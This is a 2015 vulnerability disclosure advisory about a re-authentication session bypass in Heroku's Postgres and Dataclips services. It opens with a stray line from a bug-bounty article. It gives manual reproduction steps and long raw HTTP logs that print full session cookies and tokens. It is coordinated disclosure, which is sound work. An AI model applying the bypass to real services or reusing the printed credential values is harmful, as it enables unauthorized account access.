strong communication between IT staff and bug hunters. Hackers will often drop unpatched vulnerabilities to the public domain if an organisation fails to respond or refuses to fix the bugs. Source
  13. Document Title: =============== Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1323 Video: http://www.vulnerability-lab.com/get_content.php?id=1336 Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/06/09/heroku-bug-bounty-2015-api-re-auth-session-token-bypass-vulnerability Release Date: ============= 2015-06-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1323 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity. Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling. Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins. (Copy of the Vendor Homepage: https://www.heroku.com/home ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research team discovered a application-side session validation vulnerability in the official Heroku API and web-application. Vulnerability Disclosure Timeline: ================================== 2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program) 2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program) 2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team) 2015-06-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Heroku Product: Heroku Dashboard - Web Application (API) 2014 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service. The vulnerability allows an attacker to request unauthorized information without the second forced re authentication module. The heroku web-service provides to all web services an expire session function that disallows to visit the page without re authentication. The dataclips page session of the editor and the postgres service allows to add for example new context. If the session expires in the main heroku web-service the user will be forced to login again. During the tests we releaved that the session of the dataclip service and editor is available even if the re-authentication service is still running. If the local attacker changes the path manually to request directly the stored context in the profile (like shown in video) he is able to bypass the security mechanism to add or request the database name. The session validation mechnism needs to provoke a refresh of the progres datasheet page or the dataclips add through editor to prevent unauthorized access after a session has been expired during the usage of the heroku service. The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction. Successful exploitation of the vulnerability results in the evade and bypass of the re-authentication mechanism. Proof of Concept (PoC): ======================= The local re auth bypass vulnerability can be exploited by local attackers with low privilege web-application user account or by remote attackers without privlege web-application account and high user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the re-auth bypass vulnerability ... 1. Register a webpage account at the official heroku website 2. Provoke the re-auth function that pops up after several profile interaction during the time after the session expired 3. When the session is expired to do not press the re-auth function button that popup stable to all service 4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired to all other modules and sites Note: Even if all session are expired the user is able to request the database and the dataclips in the service without authorization 5. Successful reproduce of the session vulnerability! Video Demonstration The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases. The session expired values also needs to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself. Exception Message: -Your session has expired --Your current session has expired or become inactive and has been terminated. ---Please log in again to continue using Dashboard. --- PoC Session Logs --- 17:55:32.218[718ms][total 718ms] Status: 303[See Other] GET https://id.heroku.com/logout Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[id.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://www.heroku.com/home] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=sqPL2wMwiUxRKRDIZRZpFZtpQVHNL051XZMscTdZzo85hsFiMzwNrL-ZgLLCf8llJTtLTk8ilInCKAeHek3hJ971JEcCHKfGmen-xMGjed0pjaT5KG1CKDBB-oPo5z_trM8eSSBDiLUnva-T9N6Pty3jwbNpxFYeHFG79jB1K1j-lc_-dB8tACasWzQbFPc5d-6ampRWbPJf4ZQhglDefQdPrvLEqwO5BD5uXKzT2WKvilkEqdnzzbUKXm3WD1GMWZwqsV6hkeUJMn5vbsVb32yIm1r7sWL5WxuYMvbTpEdMWcA5mDJzoc0ME_Oo0F4Sz3lhIxBhipySHAYlAiR6B7SQCocJGSCqIJckDiQ_cZ5wY8s2hmGAvL2YKGb4gZGLMR2VvJDC8AEOhbS5ofhZDrYTvEaRCFgqweI3KGFQlcie7C2AQnYFgo7UfnilQsLZEVKAZnJ_f6wy3t9a108LwzUxg5aQ27mYexe5IK3Ei2ji5BNFcphWiujvrHG4TjtQwtxfF6eZZhTurqM1Rcwle2hPfQqQlSMrEf54dh_nurL6Oyh3mMHi68mhDZm6zIaAq-GCGpx8PwNhwZ8Wp1ZjmD04fFsPKBZBA9pJ2IMuP5NBgP6dpkPuPa1MxIlDpPuz6PuK_ONBKPI-ApKey2g6_6r6dHXBZU-dBMAX9nNm16r7rEoJR4StN3ApBazWVxHDTMJdprFoMbcAYsUEsjFQBMuNMwe3GKxvFKNynwK-GWsjCxL_BMe8pZQVaW7h-qSZWydA4Pmx9VmkTdEZ7e4BXiGXZCUo6et8QyZLK4SfV4tod03s6MkB3nbWjSLEsJyo4KQSDu4jJyqP7g9nvRuJz67XHl_pTLcV2updPygb3qrlyeFZLhuXtjsDbpWHMxWjvjhX7g63QkdsCSsytKBOYNsKZu8npvW59b3U6jO-aB-ZN4hMDbogRSKRhRE1bIrN%7CbHVM61lFujhv41-3Kbdezg%3D%3D%7C90aed411ab431962695b4954963c46d29c694c5b89ee793a1654e400d0830070; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; heroku_session=1; heroku_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D] Connection[keep-alive] Response Header: Server[Cowboy] Date[Sat, 20 Sep 2014 15:55:42 GMT] Connection[keep-alive] Strict-Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] Content-Type[text/html;charset=utf-8] Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure] Location[https://id.heroku.com/login] Vary[Accept-Encoding] Content-Encoding[gzip] Request-Id[17eefe38-a226-46fc-8e1d-2f673d87db10] Transfer-Encoding[chunked] Via[1.1 vegur] 17:55:32.937[159ms][total 818ms] Status: 200[OK] GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[id.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://www.heroku.com/home] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=FaVrS4hqnR9mnjhckrTvVfSsfPhzKXgca1SNr8Oyr6N_-ub6c_egK8dLEHO_KeAnQB1aERkdfw_LeQdQHfDHrK-3DK91e12mqCMinL-Fsdndcdg7ZY1hyrdSQXmcs1ER5d2gkk4BeU8nn2irz9fWX7Qnwmax_MKaYj1JyCxhpwGBESHwyiMOtW0v4EAuhdDi1k31ltpEem6D7VXfj-2izYDDwNrCLOOYyifekUr2YnViziFTFcnECk7ynTFG7LrK%7CczNDqJrktR8EodaST7bDZA%3D%3D%7C855c1f5d2b8faf34a68e30535e723bfa6c2eec88e4819c36e02dba20099c14ed; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.59.9.1411228524365; optimizelyPendingLogEvents=%5B%22n%3Dengagement%26g%3D170873954%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228532074%26f%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.heroku.com%252Fhome%26u%3Doeu1411214007860r0.1948891553088572%26wxhr%3Dtrue%26t%3D1411228529309%26f%3D%22%5D] Connection[keep-alive] Response Header: Server[Cowboy] Date[Sat, 20 Sep 2014 15:55:42 GMT] Connection[keep-alive] Strict-Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] Content-Type[text/html;charset=utf-8] Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure rack.session=HSkfR06GR1NnxhFxsmBIy0sVnJareQJv2qjGRfPXqF3Dxw-NQDVWTkf5IxbkOvB9Z8WGGhGe2f4_P7ZkiWLRnuY_mYbgteaZNCrRtb13u0v7TCQN96dgWRfbP5lSlsLzJ3A_QBzFn0LtDWiUwv1GIPgmrGvMMRRNm6k7YRgVDF1VUVKLyo4eJ57fFw6kQG6_QeSZXL2pYCnvRe779I47DXgY-VrPXUbI5Uk9Cznr49pEvkkRfb3QatvMR8el3E8QT6StkYQQEDwzL2ZYJroQXhHPMa-yHcGVoNATooiumbPXBEOM1a-fKUdJ7s56yZ9l93Ie4fVxLOUtRRtjJd-O7Sg3FLqdiNM7siMYpSD_gxh_XT3hWYbd4h5t9Xoj_zgOtxiDJlM63RchlyCtoFERag%3D%3D%7CFvfX9eXB36GDcprUj47Nrg%3D%3D%7C3212ecd5bcd6a88fd376d7bd6a58dda06d5de2e01f9b066d2dce3e441b8d09b2; path=/; expires=Mon, 20 Oct 2014 15:55:43 -0000; HttpOnly; secure] Vary[Accept-Encoding] Content-Encoding[gzip] Request-Id[6c5a1418-f70d-4eb5-901c-8b333e82d2e3] Transfer-Encoding[chunked] Via[1.1 vegur] 17:56:11.833[437ms][total 437ms] Status: 302[Found] GET https://postgres.heroku.com/databases Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[postgres.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/clips/new] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CEkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBG--16c1365df04da320c8f856f41afe6b154b068da3; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365] Connection[keep-alive] Response Header: Server[Cowboy] Connection[close] Date[Sat, 20 Sep 2014 15:56:22 GMT] status[302 Found] Strict-Transport-Security[max-age=99; includeSubdomains] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1] Location[https://postgres.heroku.com/login] Content-Type[text/html; charset=utf-8] x-ua-compatible[IE=Edge,chrome=1] Cache-Control[no-cache, private] Set-Cookie[_session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; path=/; secure; HttpOnly] x-request-id[3757ef00-dcc8-44e7-9413-c3d1beab8f0d] x-runtime[0.008472] x-rack-cache[miss] Via[1.1 vegur] 17:56:12.273[183ms][total 183ms] Status: 302[Found] GET https://postgres.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[postgres.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/clips/new] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=BAh7CUkiD3Nlc3Npb25faWQGOgZFVEkiJWU0MWEyZTc5NDc5M2Q4YTI0MDg5OTUzZjYxODNkYTc3BjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVRtUk91NGFhNWZBdDVRRURTem9XRmtWZkloRkFuMldMREJDYXZHd3ltK1E9BjsARkkiD2NzcmYudG9rZW4GOwBUSSIxbjJoak5xNkRSNEdkaWlOak1JOTJ2VHB5dmtqK1NKYW8xNXBwLy9oSHhMUT0GOwBGSSIQcmVkaXJlY3RfdG8GOwBGIg8vZGF0YWJhc2Vz--ed40c9baff4bd3ebaeb5a84c4b9afc6831c4b2a0; user_session_secret=BAhJIgHCUms1UlVXbGhSelUzZFRFd1VuRk5TMWhDU0ZWRVptMXRkVnBWVVVjeFQyaHBTWGh6VEdOc2NHWXdiVmRDWTFZMWNVdFVWMGhuUTFKSVowNW5lV3BaUjNrNE1teEtTVTlCT0RNclZDdFdTR2xHVkM5elVtYzlQUzB0U2pWaWFEbGlNM0pLVTBkSlFWSlRPRTlIUTJaaFFUMDktLTc0MTM3N2ZhOTc5ZmRiYjNmMjI2N2EzYzU1NmNlOTRkYmNjMzg2YzkGOgZFRg%3D%3D--0423c026f66ea9da3bf9c5f335ac142a95b2e819; postgres_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; __utmb=148535982.62.9.1411228524365] Connection[keep-alive] Response Header: Server[Cowboy] Connection[close] Date[Sat, 20 Sep 2014 15:56:22 GMT] status[302 Found] Strict-Transport-Security[max-age=99; includeSubdomains] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1] Location[https://postgres.heroku.com/auth/heroku] Content-Type[text/html; charset=utf-8] x-ua-compatible[IE=Edge,chrome=1] Cache-Control[no-cache, private] Set-Cookie[user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure super_user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure postgres_session_nonce=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure] x-request-id[aab5515c-db99-4516-afb9-f81c6d7427e3] x-runtime[0.005907] x-rack-cache[miss] Via[1.1 vegur] 17:56:13.046[161ms][total 897ms] Status: 200[OK] GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[id.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/clips/new] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; rack.session=Oj3BV4aM5iZSvASRXbZL38nzvzIIh2T_S6vdquNUi-OZ6JARZBmQ2zTzwbXj9r1M5TY2tCgCUDV6CmJzJm06aX0EH6gr2QJTjzVd64_n-FlnBUmFFLaDc_gtbPTYX3K8SsDCHAVVhA75xb6j6bvFqlPk-Ne-848PcKFchgdKGSflzC8_-Wfqqg9hppwmjdb6ia9bKqejpkXY49b0ehF8FxQp8s7etE4YxhHhvIzJqxUd3oxBjZo_F2Zoec30Cc6dRuPk5J8bocsC8_8Zq09DoZFqN_DOG41HDlbKIW1TKUtFLfCvuQ3KoE7cjM7dSdVzZZf7uehizmAGWkBPIWp-fJRoUG3L2Rpoo0VZdN_ih-BGCtGMNiFb3K4586XR9yQWMuEiikHz1yhZp_fK7oZk60Ps3vTnNi1zGxRcfW_N3ScLeVLSyHMqefqlqtVMAWqTf5qP5pbBhbPiwJKTnowmmNPx92DrmkqWD0SrdKHOVtcWrCvwmNW5dzG7zAFQ_BMFAU-1c7BDbIkTSBEI0YuSu48HuLkTAjNPJBuSLXJkj42h1MPsx3Vxz8HakjQxIJt1KirqkcQdZTlPheoKI0iYpi4V27TRMZtrb8AZh9mMtEo435snF2SDhMHSdzniCMlA7G-Ngw4EheMslTp5BsqmhIQiy0-hklsUKnMX8Hedh3g%3D%7CwHQzLOXMlHCSl_paZ8IydQ%3D%3D%7Cc627cc2ac2f61b0720781b7b15c81836840a4546ae4365f68d3c89ffd9d513d5; _ga=GA1.3.181049422.1411214008; visitor_id36622=273629684; __utmb=148535982.62.9.1411228524365] Connection[keep-alive] Response Header: Server[Cowboy] Date[Sat, 20 Sep 2014 15:56:22 GMT] Connection[keep-alive] Strict-Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] Content-Type[text/html;charset=utf-8] Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure rack.session=P8zZlFpkxJkI4ZLxjTorLaS7chYJ_xvm3tBRWqep-FyoNj_WSHDck99ggLaKgLczUMG6QylLu1VbNinWWd2uTvosTC3p811iQmobo8BwOeNgaY-Iyei8yP-c294TzPqzGmipSdIDCpCJJNlRu9fNDBgAppjFQi8lwNVmyyVPgwZc1tMa6KBi9Dx9Z6QxGLGykZPfxZvLCXHanhPgfRdxttpcO4uG-zklXg7kHrAri8MDvjXJbXvXr-BBnkWbr1hPFOH2z7BZXiBvTeKIuB6N_fqOEredXT8KRwcVGHxoHRFVsBQvr8bFqR8C_ImSzTqpkjjA_32wqf_t8oyVyGRt6Wf2RAjCO2Ve9nvECAaMhlA0AAChwZ7zPDYErU6WPGumLDLGGQJyeRxB31TPehBownCAIAtyZIBmoBmnCNRM5t6czeCBR1U7xMTBctVh58lH-0WIE1uESRcFYGiEjrefszmsjtQuv8XOS3i0zqBn4e7rKe5BQvvm_lWLlDOumVoMa7OKsaV7TuprlYP4n5LpWeOenBxb1JtTY8ASoQzv3rllKfG_LuQn0OGHVnCu9BsSd6B9qdZKqNZL1kA2xlt3SKrjt5qgIpLs3Wq4N3H3n5yXCIKduxNkqDFd5bJ8Ibx1prC44SktuOnv4v9xQaCTtWfw3NI_068iXRGBt0sDnq0%3D%7Cdyw4qNVeN1QJkse0PYVkMA%3D%3D%7Cf92ff337070c04e0bc1331b08bd2d38420af6bea0707a1ccfc813d4ce3b89c82; path=/; expires=Mon, 20 Oct 2014 15:56:23 -0000; HttpOnly; secure] Vary[Accept-Encoding] Content-Encoding[gzip] Request-Id[8583828c-b434-43b4-a8a2-9df47b64d82d] Transfer-Encoding[chunked] Via[1.1 vegur] 17:56:37.841[603ms][total 603ms] Status: 302[Found] GET https://dashboard.heroku.com/account Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[dashboard.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _my-heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZG--af37490991f3a343d1126f2e451efbf7744c0f9a; __utmb=148535982.65.9.1411228524365; 